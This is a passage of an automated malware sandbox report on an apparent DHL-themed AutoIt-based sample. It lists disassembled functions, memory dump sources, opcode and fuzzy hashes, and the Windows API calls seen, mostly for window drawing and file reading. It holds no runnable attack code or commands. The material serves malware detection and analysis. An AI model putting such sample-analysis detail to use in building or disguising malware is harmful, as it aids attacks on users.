                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b9c99f71d091652293ddb3cb631f8af7e6875ecf99ffdaaf187a91456f870075
                                                                                            • Instruction ID: 35ae6959daee4729670cb96ba7fe0ed5abd4364a172b1fb624545bdb1f60eaba
                                                                                            • Opcode Fuzzy Hash: b9c99f71d091652293ddb3cb631f8af7e6875ecf99ffdaaf187a91456f870075
                                                                                            • Instruction Fuzzy Hash: 1832F122D29F014DD7239634E822335A659FFB73D6F15D737E81AB5AA6EB39C4834100
                                                                                            Function 0083CC39 Relevance: .6, Instructions: 635COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07cfa6e89399ad964bd01f23c845b32bfcae3f3b494fb0d46f1019bf8d6d3326
                                                                                            • Instruction ID: d26401f60a4ae6167ba94ab1ec414cf4d87a6624906d6586be92605638a29704
                                                                                            • Opcode Fuzzy Hash: 07cfa6e89399ad964bd01f23c845b32bfcae3f3b494fb0d46f1019bf8d6d3326
                                                                                            • Instruction Fuzzy Hash: 25320532A041598BCF28CE29C4D467DBBA1FB85314F28C56ED85EDB299D730DD82DB81
                                                                                            Function 00827920 Relevance: .6, Instructions: 563COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 102fa6acb381741b2ccab93968a8aaa05584cab7d1fa42c108e20e7fc9cee81f
                                                                                            • Instruction ID: 5c17aba93d889361260769fd1ed2f5ca962366ae17bf7096834218d9f26212a4
                                                                                            • Opcode Fuzzy Hash: 102fa6acb381741b2ccab93968a8aaa05584cab7d1fa42c108e20e7fc9cee81f
                                                                                            • Instruction Fuzzy Hash: 7022CFB0A0061ADFDF14CF69D981AAEB3B1FF44314F104529E812EB391EB36AD50CB51
                                                                                            Function 008291C0 Relevance: .5, Instructions: 475COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 92b0b9a4ff0bd22a4438506587dc463b08fbe50dfebcc4836e59e9a2dd77b856
                                                                                            • Instruction ID: 536dc7008219c4cefa6c0fb647c54d221d9b8453bc463f2d2526763da74321a6
                                                                                            • Opcode Fuzzy Hash: 92b0b9a4ff0bd22a4438506587dc463b08fbe50dfebcc4836e59e9a2dd77b856
                                                                                            • Instruction Fuzzy Hash: 6602B5B0E00219EBDB04DF58D881AAEB7B1FF54304F118169E956DB391EB31AE60CBD1
                                                                                            Function 00841C77 Relevance: .3, Instructions: 254COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                            • Instruction ID: d3116f785be5b75acc22248754da08ac11d87f711e166a5930443ad4e1228a13
                                                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                            • Instruction Fuzzy Hash: BC9168726080EB49DF294639857C13DFFE1FA523A531A079ED4F2CB1C5FE249994D620
                                                                                            Function 008419B0 Relevance: .2, Instructions: 240COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                            • Instruction ID: d023fd351b0204b6fb5844539d043cb73b58096f3a0aa6ba5901eb247ff77f6c
                                                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                            • Instruction Fuzzy Hash: 0E9134722091EB4ADF6D867A857C03DFFE1EA923B531A079DD4F2CA1C1FE248594D620
                                                                                            Function 00847A4A Relevance: .2, Instructions: 237COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c698811c254abc55612932da550567659efaf87d46e3ef5afbeeaed67303db3c
                                                                                            • Instruction ID: 512b0f9dd9f4b51383d97fecb4b838d94be115fa947ea0544061896ec2fa17bb
                                                                                            • Opcode Fuzzy Hash: c698811c254abc55612932da550567659efaf87d46e3ef5afbeeaed67303db3c
                                                                                            • Instruction Fuzzy Hash: 4661887160875D96EE34DA2C8C95BBE3398FF51768F10091EE983DB281DB119E42C356
                                                                                            Function 00847CA7 Relevance: .2, Instructions: 237COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ad8b4dbc212161afdf18ab22893e63b5f5ba4a8ac9ed08f07c1778726fc0caa7
                                                                                            • Instruction ID: 43e914c5af03f8308b11b9e0a0527cff804e9c5f099cbb20f02b800f849ee3bc
                                                                                            • Opcode Fuzzy Hash: ad8b4dbc212161afdf18ab22893e63b5f5ba4a8ac9ed08f07c1778726fc0caa7
                                                                                            • Instruction Fuzzy Hash: C7618F31E2C74DA7DE389A2C4D55BBF2394FF42B08F100A5AE943DB289E712DD428356
                                                                                            Function 00841706 Relevance: .2, Instructions: 232COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                            • Instruction ID: 6a3ca13c5dac3476361d76bcc370eac592a6db67bdabfe8c9f53f8ef1a1e952a
                                                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                            • Instruction Fuzzy Hash: 728175326080EB49DF6D427A857C03EFFE1FA923A131A07ADD4F2CB1C5EE248594D620
                                                                                            Function 00B65290 Relevance: .1, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                            • Instruction ID: d5ab30272ce53bc4185d4f6765597b39598a26c817eb857c559ef0242823698a
                                                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                            • Instruction Fuzzy Hash: 4041C4B1D1051CDBCF48CFADC991AAEBBF1EF88201F548299D516AB345D734AB41DB40
                                                                                            Function 00892046 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9642d89f94b075b32b05954e7e131b13038ceb30fe354cf8a2634d6c7efd063a
                                                                                            • Instruction ID: fd3c2443fd0e8b297d218ea7c9bda3178d083e0d13ab014962eeef45dbd9c689
                                                                                            • Opcode Fuzzy Hash: 9642d89f94b075b32b05954e7e131b13038ceb30fe354cf8a2634d6c7efd063a
                                                                                            • Instruction Fuzzy Hash: 9C2196326206158BDB28CE79C81267A73E5F764320F19862EE4A7C37D1DE39A904CB80
                                                                                            Function 00B65120 Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                            • Instruction ID: 612930da59d9562ac8082abbeffec69f1b0945d94a43ad75c041f1080c39cf05
                                                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                            • Instruction Fuzzy Hash: 5B019278A00509EFCB58DF98C5909AEF7F5FB48310F2085D9E909A7301D734AE51DB80
                                                                                            Function 00B65180 Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                            • Instruction ID: cfee393f52158726b15fd4a6f62314722524a0f9267a3d08791edbddeab533dc
                                                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                            • Instruction Fuzzy Hash: 3B018078A01609EFCB58DF98C5909AEF7F5FB48310F208699E809A7301D734AE51DB80
                                                                                            Function 00B63B00 Relevance: .0, Instructions: 6COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                            Function 008A2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DeleteObject.GDI32(00000000), ref: 008A2B30
                                                                                            • DeleteObject.GDI32(00000000), ref: 008A2B43
                                                                                            • DestroyWindow.USER32 ref: 008A2B52
                                                                                            • GetDesktopWindow.USER32 ref: 008A2B6D
                                                                                            • GetWindowRect.USER32(00000000), ref: 008A2B74
                                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 008A2CA3
                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 008A2CB1
                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2CF8
                                                                                            • GetClientRect.USER32(00000000,?), ref: 008A2D04
                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 008A2D40
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2D62
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2D75
                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2D80
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 008A2D89
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2D98
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 008A2DA1
                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2DA8
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 008A2DB3
                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2DC5
                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,008BFC38,00000000), ref: 008A2DDB
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 008A2DEB
                                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 008A2E11
                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 008A2E30
                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2E52
                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A303F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                            • API String ID: 2211948467-2373415609
                                                                                            • Opcode ID: ab421b7966690f2c357348725929c68c9e28ae51c7cdb1a036add75230e176ff
                                                                                            • Instruction ID: 3292371ae7bf0e930a6c4f051c8aedcb59cae4118fb3c58b25e58ec6aa76a193
                                                                                            • Opcode Fuzzy Hash: ab421b7966690f2c357348725929c68c9e28ae51c7cdb1a036add75230e176ff
                                                                                            • Instruction Fuzzy Hash: 9A025A71900219EFDB14DF68CD89EAE7BB9FB49310F108258F915EB2A1DB74AD41CB60
                                                                                            Function 008B70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 008B712F
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 008B7160
                                                                                            • GetSysColor.USER32(0000000F), ref: 008B716C
                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 008B7186
                                                                                            • SelectObject.GDI32(?,?), ref: 008B7195
                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 008B71C0
                                                                                            • GetSysColor.USER32(00000010), ref: 008B71C8
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 008B71CF
                                                                                            • FrameRect.USER32(?,?,00000000), ref: 008B71DE
                                                                                            • DeleteObject.GDI32(00000000), ref: 008B71E5
                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 008B7230
                                                                                            • FillRect.USER32(?,?,?), ref: 008B7262
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008B7284
                                                                                              • Part of subcall function 008B73E8: GetSysColor.USER32(00000012), ref: 008B7421
                                                                                              • Part of subcall function 008B73E8: SetTextColor.GDI32(?,?), ref: 008B7425
                                                                                              • Part of subcall function 008B73E8: GetSysColorBrush.USER32(0000000F), ref: 008B743B
                                                                                              • Part of subcall function 008B73E8: GetSysColor.USER32(0000000F), ref: 008B7446
                                                                                              • Part of subcall function 008B73E8: GetSysColor.USER32(00000011), ref: 008B7463
                                                                                              • Part of subcall function 008B73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 008B7471
                                                                                              • Part of subcall function 008B73E8: SelectObject.GDI32(?,00000000), ref: 008B7482
                                                                                              • Part of subcall function 008B73E8: SetBkColor.GDI32(?,00000000), ref: 008B748B
                                                                                              • Part of subcall function 008B73E8: SelectObject.GDI32(?,?), ref: 008B7498
                                                                                              • Part of subcall function 008B73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 008B74B7
                                                                                              • Part of subcall function 008B73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008B74CE
                                                                                              • Part of subcall function 008B73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 008B74DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                            • String ID:
                                                                                            • API String ID: 4124339563-0
                                                                                            • Opcode ID: ccb1ecccd6b01197a1284189af26bfee56c00caf2207513d7ab70122f86f82c2
                                                                                            • Instruction ID: 35958a5a4c1628f8a97440b991180b18086dd6b4809107da601c4a85bede440b
                                                                                            • Opcode Fuzzy Hash: ccb1ecccd6b01197a1284189af26bfee56c00caf2207513d7ab70122f86f82c2
                                                                                            • Instruction Fuzzy Hash: A9A16072008301AFDB119F64DC48E9F7BA9FB89321F100B19F9A2E62E1D775E945CB61
                                                                                            Function 00838D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(?,?), ref: 00838E14
                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00876AC5
                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00876AFE
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00876F43
                                                                                              • Part of subcall function 00838F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00838BE8,?,00000000,?,?,?,?,00838BBA,00000000,?), ref: 00838FC5
                                                                                            • SendMessageW.USER32(?,00001053), ref: 00876F7F
                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00876F96
                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00876FAC
                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00876FB7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                            • String ID: 0
                                                                                            • API String ID: 2760611726-4108050209
                                                                                            • Opcode ID: 0df79c2995bcc95b030bbc35a5febfc2e9287c584a02fbeeaa4fe4087c610eb5
                                                                                            • Instruction ID: db3a611f91e38160193725cd4e8d1ba5914d1a4b2ebc777d105f5b60db6b4bd5
                                                                                            • Opcode Fuzzy Hash: 0df79c2995bcc95b030bbc35a5febfc2e9287c584a02fbeeaa4fe4087c610eb5
                                                                                            • Instruction Fuzzy Hash: 48129D30204A01DFDB25CF28C848BB6BBE5FB85310F548569F489DB265DB72EC61DB91
